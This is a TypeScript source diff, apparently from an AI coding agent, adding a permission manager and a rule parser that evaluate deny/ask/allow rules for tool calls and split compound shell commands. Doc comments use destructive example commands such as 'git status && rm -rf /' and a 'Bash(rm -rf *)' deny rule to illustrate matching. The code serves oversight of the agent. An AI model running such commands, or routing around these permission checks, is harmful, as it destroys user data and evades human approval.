1. The base decision from Bash / command-pattern rules. + * 2. The decision derived from virtual file / network operations extracted + * via `extractShellOperations` — allows Read/Edit/Write/WebFetch rules + * to match equivalent shell commands (e.g. `cat` → Read, `curl` → WebFetch). + */ + private evaluateSingle(ctx: PermissionCheckContext): PermissionDecision { + const { toolName, command, filePath, domain, specifier } = ctx; + + // Build path context for resolving relative path patterns + const pathCtx: PathMatchContext | undefined = + this.config.getProjectRoot && this.config.getCwd + ? 
{ + projectRoot: this.config.getProjectRoot(), + cwd: this.config.getCwd(), + } + : undefined; + + const matchArgs = [ + toolName, + command, + filePath, + domain, + pathCtx, + specifier, + ] as const; + + // Compute the base decision from explicit Bash/file/domain rules. + // Using an IIFE to keep the priority-cascade logic clean. + const baseDecision: PermissionDecision = (() => { + // Priority 1: deny rules (session first, then persistent) + for (const rule of [ + ...this.sessionRules.deny, + ...this.persistentRules.deny, + ]) { + if (matchesRule(rule, ...matchArgs)) return 'deny'; + } + // Priority 2: ask rules + for (const rule of [ + ...this.sessionRules.ask, + ...this.persistentRules.ask, + ]) { + if (matchesRule(rule, ...matchArgs)) return 'ask'; + } + // Priority 3: allow rules + for (const rule of [ + ...this.sessionRules.allow, + ...this.persistentRules.allow, + ]) { + if (matchesRule(rule, ...matchArgs)) return 'allow'; + } + return 'default'; + })(); + + // `deny` is the most restrictive result — no further checks needed. + if (baseDecision === 'deny') return 'deny'; + + // For shell commands: evaluate virtual file/network operations extracted + // from the command string against Read/Edit/Write/WebFetch/ListFiles rules. + // + // Virtual ops can only ESCALATE a decision (to 'ask' or 'deny'). + // A 'default' virtual result means "shell semantics have no opinion" — it + // must never downgrade an explicit 'allow' decision from a Bash rule. + // Example: `git status` has no file ops; an allow rule for `Bash(git *)` + // should return 'allow', not be downgraded to 'default'. + if (toolName === 'run_shell_command' && command !== undefined) { + const cwd = pathCtx?.cwd ?? 
process.cwd(); + const virtualDecision = this.evaluateShellVirtualOps( + extractShellOperations(command, cwd), + pathCtx, + ); + if ( + virtualDecision !== 'default' && + DECISION_PRIORITY[virtualDecision] > DECISION_PRIORITY[baseDecision] + ) { + return virtualDecision; + } + } + + return baseDecision; + } + + /** + * Evaluate a list of virtual operations (derived from shell command analysis) + * against all current rules. Returns the most restrictive matching decision, + * or `'default'` if no rule matches any operation. + * + * Each operation is evaluated as if it were a direct invocation of its + * `virtualTool` (e.g. `read_file`, `web_fetch`, `edit`), so Read/Edit/etc. + * rules are applied naturally. + */ + private evaluateShellVirtualOps( + ops: ShellOperation[], + _pathCtx: PathMatchContext | undefined, + ): PermissionDecision { + if (ops.length === 0) return 'default'; + + let worst: PermissionDecision = 'default'; + + for (const op of ops) { + // Evaluate the virtual operation using the standard rule-matching path. + // Since op.virtualTool ≠ 'run_shell_command', this will not recurse back + // into the shell-semantics branch. + const opDecision = this.evaluateSingle({ + toolName: op.virtualTool, + filePath: op.filePath, + domain: op.domain, + }); + + if (DECISION_PRIORITY[opDecision] > DECISION_PRIORITY[worst]) { + worst = opDecision; + if (worst === 'deny') return 'deny'; // short-circuit + } + } + + return worst; + } + + /** + * Evaluate a compound command by splitting it into sub-commands, + * evaluating each independently, and returning the most restrictive result. 
+ * + * Restriction order: deny > ask > default > allow + * + * Example: with rules `allow: [safe-cmd *, one-cmd *]` + * - "safe-cmd && one-cmd" → both allow → allow + * - "safe-cmd && two-cmd" → allow + default → default + * - "safe-cmd && evil-cmd" (deny: [evil-cmd]) → allow + deny → deny + */ + private evaluateCompoundCommand( + ctx: PermissionCheckContext, + subCommands: string[], + ): PermissionDecision { + const PRIORITY: Record = { + deny: 3, + ask: 2, + default: 1, + allow: 0, + }; + + let mostRestrictive: PermissionDecision = 'allow'; + + for (const subCmd of subCommands) { + const subCtx: PermissionCheckContext = { + ...ctx, + command: subCmd, + }; + const decision = this.evaluateSingle(subCtx); + + if (PRIORITY[decision] > PRIORITY[mostRestrictive]) { + mostRestrictive = decision; + } + + // Short-circuit: deny is the most restrictive possible + if (mostRestrictive === 'deny') { + return 'deny'; + } + } + + return mostRestrictive; + } + + // --------------------------------------------------------------------------- + // Registry-level helper + // --------------------------------------------------------------------------- + + /** + * Determine whether a tool should be present in the tool registry. + * + * A tool is disabled (returns false) when a `deny` rule without a specifier + * (i.e. a whole-tool deny) matches. Specifier-based deny rules such as + * `"Bash(rm -rf *)"` do NOT remove the tool from the registry – they only + * deny specific invocations at runtime. + */ + isToolEnabled(toolName: string): boolean { + const canonicalName = resolveToolName(toolName); + + // If a coreTools allowlist is active, only explicitly listed tools are + // registered. This mirrors the legacy `tools.core` whitelist semantic: + // any tool NOT in the allowlist is excluded from the registry entirely. 
+ if (this.coreToolsAllowList !== null && this.coreToolsAllowList.size > 0) { + if (!this.coreToolsAllowList.has(canonicalName)) { + return false; + } + } + + // evaluate({ toolName }) without a command will only match rules that have + // no specifier, which is the correct registry-level check. + const decision = this.evaluate({ toolName: canonicalName }); + return decision !== 'deny'; + } + + // --------------------------------------------------------------------------- + // Shell command helper + // --------------------------------------------------------------------------- + + /** + * Determine the permission decision for a specific shell command string. + * + * @param command - The shell command to evaluate. + * @returns The PermissionDecision for this command. + */ + isCommandAllowed(command: string): PermissionDecision { + return this.evaluate({ + toolName: 'run_shell_command', + command, + }); + } + + // --------------------------------------------------------------------------- + // Relevance check + // --------------------------------------------------------------------------- + + /** + * Check whether any rule (allow, ask, or deny) in the current rule set + * matches the given invocation context. + * + * This allows the scheduler to skip the full `evaluate()` call when no + * rules are relevant, preserving the tool's `getDefaultPermission()` result + * as-is. + * + * "Relevant" means at least one rule's toolName matches AND, if the rule + * has a specifier, it also matches the context's command/filePath/domain. + * + * Examples for Shell executing `git clone xxx`: + * - "Bash" → matches (tool-level rule, no specifier) + * - "Bash(git *)" → matches (git sub-command wildcard) + * - "Bash(git clone *)" → matches (exact sub-command wildcard) + * - "Bash(git add *)" → no match (different sub-command) + * - "Edit" → no match (different tool) + * + * @param ctx - Permission check context. + * @returns true if at least one rule matches. 
+ */ + hasRelevantRules(ctx: PermissionCheckContext): boolean { + const { toolName, command, filePath, domain, specifier } = ctx; + + const pathCtx: PathMatchContext | undefined = + this.config.getProjectRoot && this.config.getCwd + ? { + projectRoot: this.config.getProjectRoot(), + cwd: this.config.getCwd(), + } + : undefined; + + const matchArgs = [ + toolName, + command, + filePath, + domain, + pathCtx, + specifier, + ] as const; + + const allRules = [ + ...this.sessionRules.allow, + ...this.persistentRules.allow, + ...this.sessionRules.ask, + ...this.persistentRules.ask, + ...this.sessionRules.deny, + ...this.persistentRules.deny, + ]; + + if (allRules.some((rule) => matchesRule(rule, ...matchArgs))) return true; + + // For shell commands: also check whether any virtual file/network operation + // extracted from the command has a relevant rule. This ensures the PM is + // consulted (and the confirmation dialog shown) when Read/Edit/etc. rules + // would match equivalent shell commands. + if (ctx.toolName === 'run_shell_command' && ctx.command !== undefined) { + const cwd = pathCtx?.cwd ?? process.cwd(); + const ops = extractShellOperations(ctx.command, cwd); + if ( + ops.some((op) => { + const opMatchArgs = [ + op.virtualTool, + undefined, + op.filePath, + op.domain, + pathCtx, + undefined, + ] as const; + return allRules.some((rule) => matchesRule(rule, ...opMatchArgs)); + }) + ) { + return true; + } + } + + return false; + } + + // --------------------------------------------------------------------------- + // Session rule management + // --------------------------------------------------------------------------- + + /** + * Add a session-level allow rule (in-memory, cleared when the session ends). + * Used when the user clicks "Always allow for this session". + * + * @param raw - The raw rule string, e.g. "Bash(git status)". 
+ */ + addSessionAllowRule(raw: string): void { + if (raw && raw.trim()) { + this.sessionRules.allow.push(parseRule(raw)); + } + } + + /** + * Add a session-level deny rule (in-memory, cleared when the session ends). + */ + addSessionDenyRule(raw: string): void { + if (raw && raw.trim()) { + this.sessionRules.deny.push(parseRule(raw)); + } + } + + /** + * Add a session-level ask rule (in-memory, cleared when the session ends). + */ + addSessionAskRule(raw: string): void { + if (raw && raw.trim()) { + this.sessionRules.ask.push(parseRule(raw)); + } + } + + // --------------------------------------------------------------------------- + // Persistent rule management + // --------------------------------------------------------------------------- + + /** + * Add a single persistent rule to the specified type. + * This modifies the in-memory rule set; the caller is responsible for + * persisting the change to disk (e.g. by writing to settings.json). + * + * @param raw - The raw rule string, e.g. "Bash(git *)" + * @param type - 'allow' | 'ask' | 'deny' + * @returns The parsed rule that was added. + */ + addPersistentRule(raw: string, type: RuleType): PermissionRule { + const rule = parseRule(raw); + // Deduplicate: skip if a rule with the same raw string already exists + const exists = this.persistentRules[type].some((r) => r.raw === rule.raw); + if (!exists) { + this.persistentRules[type].push(rule); + } + return rule; + } + + /** + * Remove a persistent rule matching the given raw string from the + * specified type. Removes the first match only. + * + * @returns true if a rule was removed, false if no matching rule was found. 
+   */
+  removePersistentRule(raw: string, type: RuleType): boolean {
+    const bucket = this.persistentRules[type];
+    const position = bucket.findIndex((existing) => existing.raw === raw);
+    if (position === -1) {
+      return false;
+    }
+    bucket.splice(position, 1);
+    return true;
+  }
+
+  // ---------------------------------------------------------------------------
+  // Default mode
+  // ---------------------------------------------------------------------------
+
+  /**
+   * Return the approval mode reported by the config's optional
+   * `getApprovalMode()` hook, or 'default' when the hook is missing or
+   * returns null/undefined.
+   * This is used by the UI layer when `evaluate()` returns 'default' to
+   * determine the actual behavior (ask vs allow).
+   */
+  getDefaultMode(): string {
+    const configuredMode = this.config.getApprovalMode?.();
+    return configuredMode ?? 'default';
+  }
+
+  /**
+   * Replace persistent rule lists (called after migrating settings).
+   * Each of `allow`, `ask` and `deny` that is present on `ruleSet` replaces
+   * the corresponding persistent list wholesale; lists that are `undefined`
+   * on `ruleSet` are left untouched.
+   */
+  updatePersistentRules(ruleSet: Partial): void {
+    for (const kind of ['allow', 'ask', 'deny'] as const) {
+      const replacement = ruleSet[kind];
+      if (replacement !== undefined) {
+        this.persistentRules[kind] = replacement;
+      }
+    }
+  }
+
+  // ---------------------------------------------------------------------------
+  // Listing rules (for /permissions UI)
+  // ---------------------------------------------------------------------------
+
+  /**
+   * Return all active rules with their types and scopes, suitable for
+   * display in the /permissions dialog.
+   */
+  listRules(): RuleWithSource[] {
+    // Output order: deny, ask, allow — session rules before persistent
+    // ("user") rules within each type.
+    const groups: Array<[PermissionRule[], RuleType, RuleScope]> = [
+      [this.sessionRules.deny, 'deny', 'session'],
+      [this.persistentRules.deny, 'deny', 'user'],
+      [this.sessionRules.ask, 'ask', 'session'],
+      [this.persistentRules.ask, 'ask', 'user'],
+      [this.sessionRules.allow, 'allow', 'session'],
+      [this.persistentRules.allow, 'allow', 'user'],
+    ];
+
+    return groups.flatMap(([rules, type, scope]) =>
+      rules.map((rule) => ({ rule, type, scope })),
+    );
+  }
+
+  /**
+   * Return the raw strings of all active allow rules, session rules first,
+   * then persistent rules. Used for telemetry.
+   */
+  getAllowRawStrings(): string[] {
+    const allowRules = [
+      ...this.sessionRules.allow,
+      ...this.persistentRules.allow,
+    ];
+    return allowRules.map((rule) => rule.raw);
+  }
+}
diff --git a/packages/core/src/permissions/rule-parser.ts b/packages/core/src/permissions/rule-parser.ts
new file mode 100644
index 000000000..8667603b4
--- /dev/null
+++ b/packages/core/src/permissions/rule-parser.ts
@@ -0,0 +1,865 @@
+/**
+ * @license
+ * Copyright 2025 Google LLC
+ * SPDX-License-Identifier: Apache-2.0
+ */
+
+import path from 'node:path';
+import os from 'node:os';
+import picomatch from 'picomatch';
+
+/**
+ * Normalize a filesystem path to use POSIX-style forward slashes.
+ *
+ * On Windows, `path.join()` produces backslash-separated paths, but the
+ * permission rule system and picomatch both work with forward slashes.
+ * This helper ensures consistent path separators across all platforms.
+ *
+ * Examples:
+ *   toPosixPath('C:\\Users\\foo\\bar') → 'C:/Users/foo/bar'
+ *   toPosixPath('/home/user/project') → '/home/user/project' (no-op on POSIX)
+ *
+ * @param p - Path string that may contain backslash separators.
+ * @returns The same string with every backslash replaced by a forward slash.
+ */
+function toPosixPath(p: string): string {
+  return p.replace(/\\/g, '/');
+}
+import type {
+  PermissionCheckContext,
+  PermissionRule,
+  SpecifierKind,
+} from './types.js';
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Tool name aliases & categories
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Map of known tool name aliases to their canonical names.
+ * Covers all built-in tools plus common aliases (including Claude Code's "Bash").
+ * Canonical names map to themselves, so a lookup is idempotent.
+ */
+export const TOOL_NAME_ALIASES: Readonly> = {
+  // Shell tool
+  run_shell_command: 'run_shell_command',
+  Shell: 'run_shell_command',
+  ShellTool: 'run_shell_command',
+  Bash: 'run_shell_command', // Claude Code compatibility
+
+  // Edit tool — "Edit" is also a meta-category covering edit + write_file
+  edit: 'edit',
+  Edit: 'edit',
+  EditTool: 'edit',
+
+  // Write File tool — also matched by "Edit" meta-category rules
+  write_file: 'write_file',
+  WriteFile: 'write_file',
+  WriteFileTool: 'write_file',
+  Write: 'write_file',
+
+  // Read File tool — "Read" is also a meta-category covering read_file + grep + glob + list_directory
+  read_file: 'read_file',
+  ReadFile: 'read_file',
+  ReadFileTool: 'read_file',
+  Read: 'read_file',
+
+  // Grep tool — also matched by "Read" meta-category rules
+  grep_search: 'grep_search',
+  Grep: 'grep_search',
+  GrepTool: 'grep_search',
+  search_file_content: 'grep_search', // legacy
+  SearchFiles: 'grep_search', // legacy display name
+
+  // Glob tool — also matched by "Read" meta-category rules
+  glob: 'glob',
+  Glob: 'glob',
+  GlobTool: 'glob',
+  FindFiles: 'glob', // legacy display name
+
+  // List Directory tool — also matched by "Read" meta-category rules
+  list_directory: 'list_directory',
+  ListFiles: 'list_directory',
+  ListFilesTool: 'list_directory',
+  ReadFolder: 'list_directory', // legacy display name
+
+  // Memory tool
+  save_memory: 'save_memory',
+  SaveMemory: 'save_memory',
+  SaveMemoryTool: 'save_memory',
+
+  // TodoWrite tool
+  todo_write: 'todo_write',
+  TodoWrite: 'todo_write',
+  TodoWriteTool: 'todo_write',
+
+  // WebFetch tool
+  web_fetch: 'web_fetch',
+  WebFetch: 'web_fetch',
+  WebFetchTool: 'web_fetch',
+
+  // WebSearch tool
+  web_search: 'web_search',
+  WebSearch: 'web_search',
+  WebSearchTool: 'web_search',
+
+  // Task tool
+  task: 'task',
+  Task: 'task',
+  TaskTool: 'task',
+
+  // Skill tool
+  skill: 'skill',
+  Skill: 'skill',
+  SkillTool: 'skill',
+
+  // ExitPlanMode tool
+  exit_plan_mode: 'exit_plan_mode',
+  ExitPlanMode: 'exit_plan_mode',
+  ExitPlanModeTool: 'exit_plan_mode',
+
+  // LSP tool
+  lsp: 'lsp',
+  Lsp: 'lsp',
+  LspTool: 'lsp',
+
+  // Legacy edit tool name
+  replace: 'edit',
+
+  // Agent (subagent) rules — "Agent" is a user-friendly alias for the Task tool.
+  // "Agent(Explore)" is parsed with toolName = "task" and specifier = "Explore"
+  Agent: 'task',
+};
+
+/**
+ * Shell tool canonical names.
+ */
+const SHELL_TOOL_NAMES = new Set(['run_shell_command']);
+
+/**
+ * File-reading tools — "Read" rules apply to all of these (best-effort).
+ *
+ * Per Claude Code docs: "Claude makes a best-effort attempt to apply Read rules
+ * to all built-in tools that read files like Grep and Glob."
+ */
+const READ_TOOLS = new Set([
+  'read_file',
+  'grep_search',
+  'glob',
+  'list_directory',
+]);
+
+/**
+ * File-editing tools — "Edit" rules apply to all of these.
+ *
+ * Per Claude Code docs: "Edit rules apply to all built-in tools that edit files."
+ */
+const EDIT_TOOLS = new Set(['edit', 'write_file']);
+
+/**
+ * WebFetch tools.
+ */
+const WEBFETCH_TOOLS = new Set(['web_fetch']);
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Tool name resolution & categorization
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Resolve a raw tool name or alias to its canonical name.
+ * Returns the input unchanged if it is not in the alias map
+ * (e.g. MCP tool names are kept as-is).
+ *
+ * @param rawName - Tool name or alias as written in a rule or tool call.
+ * @returns The canonical tool name; always a string.
+ */
+export function resolveToolName(rawName: string): string {
+  // TOOL_NAME_ALIASES is a plain object literal, so a bare index lookup also
+  // finds inherited members ("constructor", "toString", "__proto__", ...) and
+  // would return a function/object instead of a string. Only own keys count.
+  const alias = Object.prototype.hasOwnProperty.call(TOOL_NAME_ALIASES, rawName)
+    ? TOOL_NAME_ALIASES[rawName]
+    : undefined;
+  return alias ?? rawName;
+}
+
+/**
+ * Determine the specifier kind for a given canonical tool name.
+ * This tells the matching engine which algorithm to use for the specifier.
+ *
+ * @param canonicalToolName - Canonical tool name (aliases are not resolved here).
+ * @returns 'command' for shell tools, 'path' for read/edit tools, 'domain'
+ *   for WebFetch tools, and 'literal' for everything else.
+ */
+export function getSpecifierKind(canonicalToolName: string): SpecifierKind {
+  if (SHELL_TOOL_NAMES.has(canonicalToolName)) {
+    return 'command';
+  }
+  if (READ_TOOLS.has(canonicalToolName) || EDIT_TOOLS.has(canonicalToolName)) {
+    return 'path';
+  }
+  if (WEBFETCH_TOOLS.has(canonicalToolName)) {
+    return 'domain';
+  }
+  return 'literal';
+}
+
+/**
+ * Check whether a given tool (by canonical name) is covered by a rule's tool name,
+ * taking meta-categories into account.
+ *
+ * "Read" → resolves to "read_file", but also covers grep_search, glob, list_directory
+ * "Edit" → resolves to "edit", but also covers write_file
+ */
+export function toolMatchesRuleToolName(
+  ruleToolName: string,
+  contextToolName: string,
+): boolean {
+  if (ruleToolName === contextToolName) {
+    return true;
+  }
+  // "Read" → covers all READ_TOOLS
+  if (ruleToolName === 'read_file' && READ_TOOLS.has(contextToolName)) {
+    return true;
+  }
+  // "Edit" → covers all EDIT_TOOLS
+  if (ruleToolName === 'edit' && EDIT_TOOLS.has(contextToolName)) {
+    return true;
+  }
+  return false;
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Rule parsing
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Parse a raw permission rule string into a PermissionRule object.
+ *
+ * Supported formats:
+ *   "ToolName"             → matches all invocations of the tool
+ *   "ToolName(specifier)"  → fine-grained matching via specifier
+ *
+ * Tool-specific specifier semantics:
+ *   "Bash(git *)"             → shell command glob
+ *   "Read(./secrets/**)"      → gitignore-style path match
+ *   "Edit(/src/**\/*.ts)"     → gitignore-style path match
+ *   "WebFetch(domain:x.com)"  → domain match
+ *   "Agent(Explore)"          → subagent type literal match (alias for Task)
+ *   "mcp__server__tool"       → MCP tool (no specifier needed)
+ *
+ * A rule whose closing ")" is missing (e.g. "Bash(git status") keeps the text
+ * after "(" as its specifier, so a typo can never widen the rule to every
+ * invocation of the tool.
+ *
+ * @param raw - The raw rule string; surrounding whitespace is ignored.
+ * @returns The parsed rule; `raw` holds the trimmed input string.
+ */
+export function parseRule(raw: string): PermissionRule {
+  const trimmed = raw.trim();
+
+  // Handle legacy `:*` suffix (deprecated, equivalent to ` *`)
+  // e.g. "Bash(git:*)" → "Bash(git *)"
+  const normalized = trimmed.replace(/:(\*)/, ' $1');
+
+  const openParen = normalized.indexOf('(');
+
+  if (openParen === -1) {
+    // Simple tool name rule (no specifier)
+    const canonicalName = resolveToolName(normalized);
+    return {
+      raw: trimmed,
+      toolName: canonicalName,
+    };
+  }
+
+  const toolPart = normalized.substring(0, openParen).trim();
+  // Strip the closing paren when present; otherwise take everything after
+  // "(" so the rule stays narrowly scoped instead of becoming a bare tool rule.
+  const specifierEnd = normalized.endsWith(')')
+    ? normalized.length - 1
+    : normalized.length;
+  const specifier = normalized.substring(openParen + 1, specifierEnd);
+
+  const canonicalName = resolveToolName(toolPart);
+  const specifierKind = specifier ? getSpecifierKind(canonicalName) : undefined;
+
+  return {
+    raw: trimmed,
+    toolName: canonicalName,
+    specifier,
+    specifierKind,
+  };
+}
+
+/**
+ * Parse an array of raw rule strings into PermissionRule objects,
+ * silently skipping any empty entries.
+ */
+export function parseRules(raws: string[]): PermissionRule[] {
+  return raws.filter((r) => r && r.trim()).map(parseRule);
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Minimum-scope rule generation
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Map from canonical tool names to the preferred display names used in
+ * permission rule strings.
+ *
+ * Read tools all map to "Read" (meta-category) so a single rule covers the
+ * entire family (read_file, grep_search, glob, list_directory).
+ * Edit tools map to "Edit" (meta-category) covering edit + write_file.
+ * Other tools use their individual display alias.
+ */
+const CANONICAL_TO_RULE_DISPLAY: Readonly<Record<string, string>> = {
+  // Read meta-category
+  read_file: 'Read',
+  grep_search: 'Read',
+  glob: 'Read',
+  list_directory: 'Read',
+  // Edit meta-category
+  edit: 'Edit',
+  write_file: 'Edit',
+  // Shell
+  run_shell_command: 'Bash',
+  // Web
+  web_fetch: 'WebFetch',
+  web_search: 'WebSearch',
+  // Agent / Skill
+  task: 'Task',
+  skill: 'Skill',
+  // Others
+  save_memory: 'SaveMemory',
+  todo_write: 'TodoWrite',
+  lsp: 'Lsp',
+  exit_plan_mode: 'ExitPlanMode',
+};
+
+/**
+ * Get the human-friendly display name to use in a permission rule string
+ * for a given canonical tool name.
+ *
+ * Falls back to the canonical name itself for unknown tools (e.g. MCP tools).
+ */
+export function getRuleDisplayName(canonicalToolName: string): string {
+  // Own-property lookup only: names such as "constructor" must fall back to
+  // themselves rather than resolve to an inherited Object.prototype member.
+  const display = Object.prototype.hasOwnProperty.call(
+    CANONICAL_TO_RULE_DISPLAY,
+    canonicalToolName,
+  )
+    ? CANONICAL_TO_RULE_DISPLAY[canonicalToolName]
+    : undefined;
+  return display ?? canonicalToolName;
+}
+
+/**
+ * Tools whose parameter path points to a **file** (as opposed to a directory).
+ *
+ * For these tools the minimum-scope rule uses `path.dirname()` so the rule
+ * covers the containing directory rather than a single file — e.g.
+ *   read_file("/Users/alice/.secrets") → `Read(//Users/alice)`
+ *
+ * Directory-targeted tools (list_directory, grep_search, glob) already receive
+ * a directory path, so they use it as-is.
+ */
+const FILE_TARGETED_TOOLS = new Set(['read_file', 'edit', 'write_file']);
+
+/**
+ * Build minimum-scope permission rule strings from a permission check context.
+ *
+ * This is the **single, centralised** function for generating rules to be
+ * persisted when a user selects "Always Allow". Rules follow the format
+ * `DisplayName(specifier)` where the specifier narrows the rule to the
+ * minimum scope required by the current invocation.
+ *
+ * Specifier selection by tool category:
+ *   - **path** tools (Read/Edit):
+ *     File-targeted tools (read_file, edit, write_file) use the **parent
+ *     directory** so the rule covers the whole directory, not a single file.
+ *     Directory-targeted tools (grep, glob, ls) use the directory as-is.
+ *     The `//` prefix denotes an absolute filesystem path in the rule grammar.
+ *   - **domain** tools (WebFetch): `WebFetch(example.com)`
+ *   - **command** tools (Bash): `Bash(command)` — note: Shell already generates
+ *     its own fine-grained rules via `extractCommandRules`; this is a fallback.
+ *   - **literal** tools (Skill/Task): `Skill(name)` / `Task(type)`
+ *
+ * If no specifier is available the rule falls back to the bare display name
+ * (e.g. `Read`), which matches **all** invocations of that tool category.
+ *
+ * @param ctx - The permission check context (built in coreToolScheduler L4).
+ * @returns Array of rule strings (usually a single element).
+ */
+export function buildPermissionRules(ctx: PermissionCheckContext): string[] {
+  const canonicalName = resolveToolName(ctx.toolName);
+  const displayName = getRuleDisplayName(canonicalName);
+  const kind = getSpecifierKind(canonicalName);
+
+  switch (kind) {
+    case 'command':
+      // Shell commands — fallback only; shell.ts provides its own rules via
+      // extractCommandRules which are more granular (per-simple-command).
+      if (ctx.command) {
+        return [`${displayName}(${ctx.command})`];
+      }
+      return [displayName];
+
+    case 'path':
+      if (ctx.filePath) {
+        // For file-targeted tools, scope to the containing directory;
+        // for directory-targeted tools the path is already a directory.
+        const dirPath = FILE_TARGETED_TOOLS.has(canonicalName)
+          ? path.dirname(ctx.filePath)
+          : ctx.filePath;
+        // Join the directory and the recursive glob with exactly one "/".
+        // A directory that already ends in "/" (the filesystem root, or a
+        // directory argument with a trailing slash) must not gain a second
+        // one: "//**" inside the pattern would never match a real path.
+        const base = dirPath.endsWith('/') ? dirPath : `${dirPath}/`;
+        // The extra leading "/" marks an absolute filesystem path in the rule
+        // grammar: resolvePathPattern("//foo/**") → "/foo/**".
+        const absoluteMarker = dirPath.startsWith('/') ? '/' : '';
+        return [`${displayName}(${absoluteMarker}${base}**)`];
+      }
+      return [displayName];
+
+    case 'domain':
+      if (ctx.domain) {
+        return [`${displayName}(${ctx.domain})`];
+      }
+      return [displayName];
+
+    case 'literal':
+    default:
+      if (ctx.specifier) {
+        return [`${displayName}(${ctx.specifier})`];
+      }
+      return [displayName];
+  }
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// Shell command matching
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Shell operator tokens that act as command boundaries.
+ * Ordered by length (longest first) for correct multi-char operator detection.
+ * A lone `&` (background) and a newline also terminate a command.
+ */
+const SHELL_OPERATORS = ['&&', '||', ';;', '|&', '|', ';', '&', '\n'];
+
+/**
+ * Tell whether the `&` at `index` belongs to a redirection (`2>&1`, `>&2`,
+ * `<&3`, `&>file`, `&>>file`) rather than acting as a command separator.
+ */
+function isRedirectionAmpersand(command: string, index: number): boolean {
+  const previous = command[index - 1];
+  const next = command[index + 1];
+  return previous === '>' || previous === '<' || next === '>';
+}
+
+/**
+ * Split a compound shell command into its individual simple commands
+ * by splitting on unquoted shell operators (&&, ||, ;, |, &, newline, etc.).
+ *
+ * Quoting follows POSIX rules: a backslash escapes the next character
+ * everywhere except inside single quotes, where it is an ordinary character
+ * (so `'x\'` is a complete quoted string).
+ *
+ * Returns an array of trimmed simple command strings.
+ * For simple commands (no operators), returns a single-element array.
+ *
+ * Examples:
+ *   "git status && rm -rf /"  → ["git status", "rm -rf /"]
+ *   "ls -la | grep foo"       → ["ls -la", "grep foo"]
+ *   "echo 'a && b'"           → ["echo 'a && b'"]  (inside quotes)
+ *   "a && b || c"             → ["a", "b", "c"]
+ *   "sleep 1 & rm x"          → ["sleep 1", "rm x"]
+ *   "make 2>&1 | tee log"     → ["make 2>&1", "tee log"]
+ *
+ * @param command - The full shell command line.
+ * @returns The simple commands in order; `[command]` if nothing non-empty remains.
+ */
+export function splitCompoundCommand(command: string): string[] {
+  const commands: string[] = [];
+  let inSingle = false;
+  let inDouble = false;
+  let escaped = false;
+  let lastSplit = 0;
+
+  for (let i = 0; i < command.length; i++) {
+    const ch = command[i]!;
+
+    if (escaped) {
+      escaped = false;
+      continue;
+    }
+    // Inside single quotes a backslash is literal; treating it as an escape
+    // would swallow the closing quote and hide every operator after it.
+    if (ch === '\\' && !inSingle) {
+      escaped = true;
+      continue;
+    }
+    if (ch === "'" && !inDouble) {
+      inSingle = !inSingle;
+      continue;
+    }
+    if (ch === '"' && !inSingle) {
+      inDouble = !inDouble;
+      continue;
+    }
+    if (inSingle || inDouble) {
+      continue;
+    }
+
+    // Check for shell operators (longest match first)
+    const op = SHELL_OPERATORS.find((candidate) =>
+      command.startsWith(candidate, i),
+    );
+    if (op === undefined) {
+      continue;
+    }
+    if (op === '&' && isRedirectionAmpersand(command, i)) {
+      continue;
+    }
+
+    const segment = command.substring(lastSplit, i).trim();
+    if (segment) {
+      commands.push(segment);
+    }
+    lastSplit = i + op.length;
+    i = lastSplit - 1; // -1 because the loop will i++
+  }
+
+  // Add the last segment
+  const lastSegment = command.substring(lastSplit).trim();
+  if (lastSegment) {
+    commands.push(lastSegment);
+  }
+
+  return commands.length > 0 ? commands : [command];
+}
+
+/**
+ * Match a shell command against a glob pattern.
+ *
+ * Key semantics (from Claude Code docs):
+ *
+ * 1. `*` wildcard can appear at any position (head, middle, tail).
+ *
+ * 2. **Word boundary rule**: A space before `*` enforces a word boundary.
+ *    - `Bash(ls *)` matches `ls -la` but NOT `lsof`
+ *    - `Bash(ls*)` matches both `ls -la` and `lsof`
+ *
+ * 3. **Shell operator awareness**: Patterns don't match across operator
+ *    boundaries. This function performs no splitting itself; the caller is
+ *    expected to pass one simple command at a time.
+ *
+ * 4. Without `*`, uses prefix matching for backward compatibility.
+ *    `Bash(git commit)` matches `git commit -m "test"`.
+ *
+ * 5. `Bash(*)` is equivalent to `Bash` and matches any command.
+ *
+ * @param pattern - The rule specifier, e.g. "git *".
+ * @param command - A single simple command.
+ * @returns True when the command satisfies the pattern.
+ */
+export function matchesCommandPattern(
+  pattern: string,
+  command: string,
+): boolean {
+  // A lone `*` accepts any single command.
+  if (pattern === '*') {
+    return true;
+  }
+
+  // The literal text between wildcards; a single piece means "no wildcard".
+  const literals = pattern.split('*');
+  if (literals.length === 1) {
+    // Prefix matching (backward compat): "git commit" matches "git commit"
+    // and "git commit -m test" but NOT "gitcommit".
+    return command === pattern || command.startsWith(pattern + ' ');
+  }
+
+  // Translate each literal piece, together with the `*` that follows it,
+  // into a regex fragment:
+  //   - piece ending in a space ("ls " + `*`): word boundary — the command
+  //     may stop right after the word or continue with " <anything>"
+  //   - any other piece ("ls" + `*`): the piece followed by anything
+  // The final piece has no `*` after it and is matched literally.
+  const finalIndex = literals.length - 1;
+  const source = literals
+    .map((literal, index) => {
+      if (index === finalIndex) {
+        return escapeRegex(literal);
+      }
+      if (literal.endsWith(' ')) {
+        return escapeRegex(literal.slice(0, -1)) + '( .*)?';
+      }
+      return escapeRegex(literal) + '.*';
+    })
+    .join('');
+
+  try {
+    return new RegExp('^' + source + '$').test(command);
+  } catch {
+    return command === pattern;
+  }
+}
+
+/**
+ * Backslash-escape every regex metacharacter in `s` (all except `*`, which
+ * callers treat as the glob wildcard and split out beforehand).
+ */
+function escapeRegex(s: string): string {
+  return s.replace(/[.+?^${}()|[\]\\]/g, '\\$&');
+}
+
+// ─────────────────────────────────────────────────────────────────────────────
+// File path matching (gitignore-style)
+// ─────────────────────────────────────────────────────────────────────────────
+
+/**
+ * Resolve a path pattern from a permission rule specifier to an absolute
+ * glob pattern for matching.
+ *
+ * Path pattern prefixes (from Claude Code docs):
